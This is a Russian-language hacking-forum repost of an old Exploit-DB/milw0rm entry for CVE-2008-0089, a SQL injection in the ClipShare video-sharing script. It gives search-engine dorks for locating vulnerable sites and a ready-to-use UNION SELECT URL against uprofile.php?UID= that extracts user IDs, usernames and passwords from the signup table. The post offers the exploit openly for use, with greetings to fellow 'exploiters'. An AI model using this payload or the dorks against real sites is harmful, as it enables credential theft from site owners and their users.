Exploit ClipShare - 'UID' SQL Injection

  • Автор темы Exploiter
  • Дата начала
  • Просмотров 3293 Просмотров

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
4830
Проверка EDB
  1. Пройдено
Автор
KRIT
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2008-0089
Дата публикации
2008-01-02
Код:
#########################################################################
          video sharing www.clip-share.com Remote SQL Injection Exploit All Version

#########################################################################
AUTHOR :Krit webmaster of http://www.thaishadow.com
HOME : http://www.thaishadow.com
Download : http://www.clip-share.com/
###########################################################################
DorKs :inurl:/uprofile.php?UID=
or
"Powered by clipshare"
###########################################################################
## EXPLOIT :
http://server.com/Path/uprofile.php?UID=1+and+1=2+union+select+1,2,concat(uid,char(58),username,char(58),pwd),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+signup+limit+0,20/*
###########################################################################
## GREETZ  : Exploiters,Pongz,{OHM},Usermode,windows98SE,azazel,Tesz,Mr`Ping
###########################################################################

# milw0rm.com [2008-01-02]
 
Источник
www.exploit-db.com

Похожие темы